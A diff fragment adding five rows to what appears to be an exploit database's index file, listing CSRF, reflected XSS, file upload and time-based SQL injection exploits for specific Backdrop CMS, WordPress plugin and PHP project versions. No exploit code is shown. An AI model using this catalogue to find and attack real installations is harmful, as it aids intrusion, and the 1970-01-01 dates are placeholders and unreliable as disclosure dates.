+50323,exploits/php/webapps/50323.html,"Backdrop CMS 1.20.0 - 'Multiple' Cross-Site Request Forgery (CSRF)",1970-01-01,V1n1v131r4,webapps,php,
+50324,exploits/php/webapps/50324.txt,"WordPress Plugin Advanced Order Export For WooCommerce 3.1.7 - Reflected Cross-Site Scripting (XSS)",1970-01-01,0xB9,webapps,php,
+50325,exploits/php/webapps/50325.html,"WordPress Plugin Fitness Calculators 1.9.5 - Cross-Site Request Forgery (CSRF)",1970-01-01,0xB9,webapps,php,
+50326,exploits/php/webapps/50326.txt,"Budget and Expense Tracker System 1.0 - Arbitrary File Upload",1970-01-01,"()t/\\/\\1",webapps,php,
+50327,exploits/php/webapps/50327.txt,"Police Crime Record Management Project 1.0 - Time Based SQLi",1970-01-01,"()t/\\/\\1",webapps,php,